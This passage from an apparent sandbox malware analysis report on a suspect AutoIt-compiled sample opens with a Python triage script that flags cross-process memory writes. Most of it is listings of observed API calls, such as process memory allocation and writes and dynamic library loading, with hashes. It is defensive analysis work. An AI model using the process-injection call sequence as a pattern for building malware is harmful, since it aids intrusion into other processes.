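    if call.api == "SendMessageW" and len(call.args) > 1 and isinstance(call.args[1], int):
        return TREEVIEW_MESSAGES.get(call.args[1], f"msg 0x{call.args[1]:04X}")
    if call.api == "OpenProcess" and call.args and isinstance(call.args[0], int):
        mask = call.args[0]
        return "|".join(n for bit, n in PROCESS_RIGHTS.items() if mask & bit) or f"0x{mask:X}"
    return ""


def has_cross_process_write(calls: List[ApiCall]) -> bool:
    """True when the block, subcalls included, can allocate and write memory in another process."""
    return CROSS_PROCESS_WRITE <= {c.api for c in calls}


def triage(listing: str) -> dict:
    calls = parse_calls(listing)
    return {
        "calls": len(calls),
        "decoded": [(f"{c.api}@{c.ref:08X}", decode(c)) for c in calls if decode(c)],
        "cross_process_write": has_cross_process_write(calls),
    }


# Constructed samples: lines copied from this report's blocks at 0041AA79/0041AADA and
# 0041C1D3 (with its subcalls), sandbox labels removed.
TOKEN_LISTING = """\
APIs
• GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0041AA79
• GetTokenInformation.ADVAPI32(?,00000003,?,00000000,?), ref: 0041AADA
• GetLastError.KERNEL32(?,00000003,?,00000000,?), ref: 0041AAE4
• HeapAlloc.KERNEL32(00000000,?,00000003,?,00000000,?), ref: 0041AAFA
• GetTokenInformation.ADVAPI32(?,00000003,00000000,?,?,?,00000003,?,00000000,?), ref: 0041AB10
"""
CROSS_LISTING = """\
APIs
  • Part of subcall function 0042430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0041BC08,?,?,00000034,00000800,?,00000034), ref: 00424335
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0041C1D3
  • Part of subcall function 004242D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0041BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00424300
  • Part of subcall function 0042422F: GetWindowThreadProcessId.USER32(?,?), ref: 0042425A
  • Part of subcall function 0042422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0041BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0042426A
  • Part of subcall function 0042422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0041BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00424280
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0041C240
• DeleteObject.GDI32 ref: 003FB0FC
"""

if __name__ == "__main__":
    for name, listing in (("token query", TOKEN_LISTING), ("control access", CROSS_LISTING)):
        print(name, triage(listing))
```

The flag is a triage lead, not a verdict: a tree-view item or rectangle buffer passed with TVM_GETITEMRECT or TVM_HITTEST has to live in the process that owns the control, so any cross-process common-control access looks exactly like this, which is consistent with the head's finding that the binary is a compiled AutoIt script whose runtime carries such code. What the decoder does make unambiguous is the value mapping: the class 3 queried at 0041AADA is TokenPrivileges, and an integrity-level query would show 25.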
APIs
  • Part of subcall function 0042430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0041BC08,?,?,00000034,00000800,?,00000034), ref: 00424335
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0041C1D3
  • Part of subcall function 004242D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0041BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00424300
  • Part of subcall function 0042422F: GetWindowThreadProcessId.USER32(?,?), ref: 0042425A
  • Part of subcall function 0042422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0041BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0042426A
  • Part of subcall function 0042422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0041BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00424280
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0041C240
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0041C28D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
• String ID: @
• API String ID: 4150878124-2766056989
• Opcode ID: 84775c3033b787384d3ec5aabba2dd47bfebcb5bbe3e0b88969372f90fac2563
• Instruction ID: f13b367bc4d8b1b489460320fd057535b00a0dac600890a9cc3a6f10d77b7ea7
• Opcode Fuzzy Hash: 84775c3033b787384d3ec5aabba2dd47bfebcb5bbe3e0b88969372f90fac2563
• Instruction Fuzzy Hash: E3415C76E00228AFDB11DFA5CC81AEEB778EF49700F00409AFA45B7180DB756E85CB65
APIs
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0047DC00,00000000,?,?,?,?), ref: 0044A6D8
• GetWindowLongW.USER32 ref: 0044A6F5
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 0044A705
Strings
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: Window$Long
• String ID: SysTreeView32
• API String ID: 847901565-1698111956
• Opcode ID: 76f0037d63253d19270ccedeea79b0598e8994afe26a1ccbeca85865cd9bc668
• Instruction ID: 7b30a83e2f9160488f52259041ea40167f036596ed301490889490f73e0f1ce2
• Opcode Fuzzy Hash: 76f0037d63253d19270ccedeea79b0598e8994afe26a1ccbeca85865cd9bc668
• Instruction Fuzzy Hash: 1031E031640205AFEB218E38CC41BEB77A9FB49324F254326F975922E0D774E8618B59
APIs
• _memset.LIBCMT ref: 00435190
• InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 004351C6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: CrackInternet_memset
• String ID: |$DC
• API String ID: 1413715105-1934285739
• Opcode ID: 69b68b61c93985aca078b68b05de0e204a7c16836c695d9e4ea9fa486babbf7a
• Instruction ID: 8e1f3d5e34932c8376755f70fdad317680789e3687189da12ca07ea4fc58a860
• Opcode Fuzzy Hash: 69b68b61c93985aca078b68b05de0e204a7c16836c695d9e4ea9fa486babbf7a
• Instruction Fuzzy Hash: E1315D71C00119ABCF01EFA5CC45EEE7FB9FF18700F00015AF905AA1A6DB35A906DB64
APIs
• SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0044A15E
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0044A172
• SendMessageW.USER32(?,00001002,00000000,?), ref: 0044A196
Strings
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: MessageSend$Window
• String ID: SysMonthCal32
• API String ID: 2326795674-1439706946
• Opcode ID: 6e06a0b9543719d377a29f33c606d5544d40275c883691109c1591b6fee8ff9a
• Instruction ID: 53d487164fda7ed44d84529a999e35a1f8bb5b1a5c76320f3415048a8b58b5c7
• Opcode Fuzzy Hash: 6e06a0b9543719d377a29f33c606d5544d40275c883691109c1591b6fee8ff9a
• Instruction Fuzzy Hash: 7921A132650218ABEF118F94CC42FEA3B79FF48754F110215FA55AB1D0D6B9AC51CB94
APIs
• SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0044A941
• SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0044A94F
• DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0044A956
Strings
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: MessageSend$DestroyWindow
• String ID: msctls_updown32
• API String ID: 4014797782-2298589950
• Opcode ID: c59a80260e3dd332cc4c02df26d5e3f00a1025697a4b652a5dfbd89dc4270b53
• Instruction ID: e9f444ccac4a83f3dd9a71e9e04a9e9657494272eab5f706899a29e32722b4f5
• Opcode Fuzzy Hash: c59a80260e3dd332cc4c02df26d5e3f00a1025697a4b652a5dfbd89dc4270b53
• Instruction Fuzzy Hash: D12190B5600209AFEB11DF19CC81D773BADEB5A3A8F05045AFA049B3A1CB74EC11CB65
APIs
• SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00449A30
• SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00449A40
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00449A65
Strings
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: MessageSend$MoveWindow
• String ID: Listbox
• API String ID: 3315199576-2633736733
• Opcode ID: 0a02fd637e55aebfd1686950b0404e1271f584559992f67f69a6289789d9af30
• Instruction ID: 804695106d9072d668b4a11893ee338a144937dfb103b58959e3fe762dc4c502
• Opcode Fuzzy Hash: 0a02fd637e55aebfd1686950b0404e1271f584559992f67f69a6289789d9af30
• Instruction Fuzzy Hash: 3B21D772610118BFEF118F54CC85FBF3BAAFF89760F01812AF9449B2A0C6759C1297A4
APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0044A46D
• SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0044A482
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0044A48F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
• API String ID: 3850602802-1010561917
• Opcode ID: 60291ca71ce6b9c2c1836d8e7d9af16d162b04062b892488a8cb0d2eafc41603
• Instruction ID: 35fc5d0f44391bb8a0017310974599730f0ee07670296bd11ec9390763d6f922
• Opcode Fuzzy Hash: 60291ca71ce6b9c2c1836d8e7d9af16d162b04062b892488a8cb0d2eafc41603
• Instruction Fuzzy Hash: 4A11E771240208BEEF209F65CC49FAB3B69FF89758F014129FA4596191D2B6E821C728
APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00402350,?), ref: 004022A1
• GetProcAddress.KERNEL32(00000000), ref: 004022A8
Strings
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RoInitialize$combase.dll
• API String ID: 2574300362-340411864
• Opcode ID: 76cb073e571d5423b819b8706329af99d8ab900f2dd9170fb26f0a2bb705fce5
• Instruction ID: 7445139b4f5e9cc01a8700a53d7ee6801a6f783474cf80e86742a58ee2e0dea8
• Opcode Fuzzy Hash: 76cb073e571d5423b819b8706329af99d8ab900f2dd9170fb26f0a2bb705fce5
• Instruction Fuzzy Hash: 14E01A74F94300ABDB905FB1ED4DB953A64A712706F104075F142E51E0EBFA4051DF0E
APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00402276), ref: 00402376
• GetProcAddress.KERNEL32(00000000), ref: 0040237D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RoUninitialize$combase.dll
• API String ID: 2574300362-2819208100
APIs
Strings
Similarity
• API ID: LocalTime__swprintf
• String ID: %.3d$WIN_XPe
• API String ID: 2070861257-2409531811
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,004421FB,?,004423EF), ref: 00442213
• GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00442225
Strings
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetProcessId$kernel32.dll
• API String ID: 2574300362-399901964
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,00000000,003E42EC,?,003E42AA,?), ref: 003E4304
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 003E4316
Strings
Similarity
• API ID: AddressLibraryLoadProc
• String ID: Wow64RevertWow64FsRedirection$kernel32.dll
• API String ID: 2574300362-1355242751
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,003E41BB,003E4341,?,003E422F,?,003E41BB,?,?,?,?,003E39FE,?,00000001), ref: 003E4359
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 003E436B
Strings
Similarity
• API ID: AddressLibraryLoadProc
• String ID: Wow64DisableWow64FsRedirection$kernel32.dll
• API String ID: 2574300362-3689287502
APIs
• LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0042052F,?,004206D7), ref: 00420572
• GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00420584
Strings
Similarity
• API ID: AddressLibraryLoadProc
• String ID: UnRegisterTypeLibForUser$oleaut32.dll
• API String ID: 2574300362-1587604923
APIs
• LoadLibraryA.KERNEL32(oleaut32.dll,?,0042051D,?,004205FE), ref: 00420547
• GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00420559
Strings
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RegisterTypeLibForUser$oleaut32.dll
• API String ID: 2574300362-1071820185
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,0043ECBE,?,0043EBBB), ref: 0043ECD6
• GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0043ECE8
Strings
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetSystemWow64DirectoryW$kernel32.dll
• API String ID: 2574300362-1816364905
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,00000000,0043BAD3,00000001,0043B6EE,?,0047DC00), ref: 0043BAEB
• GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0043BAFD
Strings
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetModuleHandleExW$kernel32.dll
• API String ID: 2574300362-199464113
                                                                                                              APIs
                                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,00443BD1,?,00443E06), ref: 00443BE9
                                                                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00443BFB
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                              • API String ID: 2574300362-4033151799
                                                                                                              • Opcode ID: 15748133c068ca541eb8e2d6411252f88b3d8fcc61e579ae220ec1312970adfc
                                                                                                              • Instruction ID: 82530be90f40989755ec5a1188e5169a0a0f963580d8a8419335eee984c64844
                                                                                                              • Opcode Fuzzy Hash: 15748133c068ca541eb8e2d6411252f88b3d8fcc61e579ae220ec1312970adfc
                                                                                                              • Instruction Fuzzy Hash: F8D0A7B1D007129FDB205FE1E848B43BEF8AB02715B30443BE445E2250E6FCC8808E18
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1da90898e4daaba029426aa61710d3f501642fcb09fb018d07f7a6cb13965381
                                                                                                              • Instruction ID: e7d0c22b4c830d7fc6764eb16f1cb3f3c7518758e1b619bfec240e67851675de
                                                                                                              • Opcode Fuzzy Hash: 1da90898e4daaba029426aa61710d3f501642fcb09fb018d07f7a6cb13965381
                                                                                                              • Instruction Fuzzy Hash: 1CC16D75A0021AEFCB14CF94C894AEEB7B5FF48704F104599E905EB291D734EE81DB94
                                                                                                              APIs
                                                                                                              • CoInitialize.OLE32(00000000), ref: 0043AAB4
                                                                                                              • CoUninitialize.OLE32 ref: 0043AABF
                                                                                                                • Part of subcall function 00420213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0042027B
                                                                                                              • VariantInit.OLEAUT32(?), ref: 0043AACA
                                                                                                              • VariantClear.OLEAUT32(?), ref: 0043AD9D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                              • String ID:
                                                                                                              • API String ID: 780911581-0
                                                                                                              • Opcode ID: 9df8024ae7387b432b5119db287d8893109c828210897e13af268875b3aaa660
                                                                                                              • Instruction ID: 945e8cf8ecb497035a3d0f1426a40d91e193d9aee36d0175d949d9e14023f5da
                                                                                                              • Opcode Fuzzy Hash: 9df8024ae7387b432b5119db287d8893109c828210897e13af268875b3aaa660
                                                                                                              • Instruction Fuzzy Hash: 71A158356447119FCB11EF15C481B2AB7E5BF88710F14854AFA9A9B3A2CB34FD05CB8A
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Variant$AllocClearCopyInitString
                                                                                                              • String ID:
                                                                                                              • API String ID: 2808897238-0
                                                                                                              • Opcode ID: 32dbe11a230fc354ce4a016cc477d321a909192e63c8c44fe4f52a7f11a8f078
                                                                                                              • Instruction ID: d86f99315ba76b6359f35c0d19c543e5062f5517383b1006531f0881b77f0824
                                                                                                              • Opcode Fuzzy Hash: 32dbe11a230fc354ce4a016cc477d321a909192e63c8c44fe4f52a7f11a8f078
                                                                                                              • Instruction Fuzzy Hash: 32519D30B0430A9BDB249F76D4A56AEB3D5EF48314F20881FE956CB2D1DB789CC1971A
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                                              • String ID:
                                                                                                              • API String ID: 3877424927-0
                                                                                                              • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                                                              • Instruction ID: 7b410fc20a38ee1ec6dcc426ce1b48b3c5e34efb37b4956d31b244641bb616b4
                                                                                                              • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                                                              • Instruction Fuzzy Hash: 8F51F7B0A00305ABDB249F69888456F7FA9AF40325F20873FF825A73D0D7799F518B59
                                                                                                              APIs
                                                                                                                • Part of subcall function 003E4517: _fseek.LIBCMT ref: 003E452F
                                                                                                                • Part of subcall function 0042C56D: _wcscmp.LIBCMT ref: 0042C65D
                                                                                                                • Part of subcall function 0042C56D: _wcscmp.LIBCMT ref: 0042C670
                                                                                                              • _free.LIBCMT ref: 0042C4DD
                                                                                                              • _free.LIBCMT ref: 0042C4E4
                                                                                                              • _free.LIBCMT ref: 0042C54F
                                                                                                                • Part of subcall function 00401C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00407A85), ref: 00401CB1
                                                                                                                • Part of subcall function 00401C9D: GetLastError.KERNEL32(00000000,?,00407A85), ref: 00401CC3
                                                                                                              • _free.LIBCMT ref: 0042C557
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                              • String ID:
                                                                                                              • API String ID: 1552873950-0
                                                                                                              • Opcode ID: 175c17775220f26e0e0cd87b3ee38f03475ae72a0804ab278d6a86c3e5061848
                                                                                                              • Instruction ID: 38b2bae76b9f55905521d2e60268c3a67dbb59d3b16dbd644b5678e7ee5a88df
                                                                                                              • Opcode Fuzzy Hash: 175c17775220f26e0e0cd87b3ee38f03475ae72a0804ab278d6a86c3e5061848
                                                                                                              • Instruction Fuzzy Hash: F75175B1A04228AFDF159F55DC81BADBBB9EF48304F1000AEF219B7291DB755A80CF59
                                                                                                              APIs
                                                                                                              • GetWindowRect.USER32(00D578E0,?), ref: 0044C544
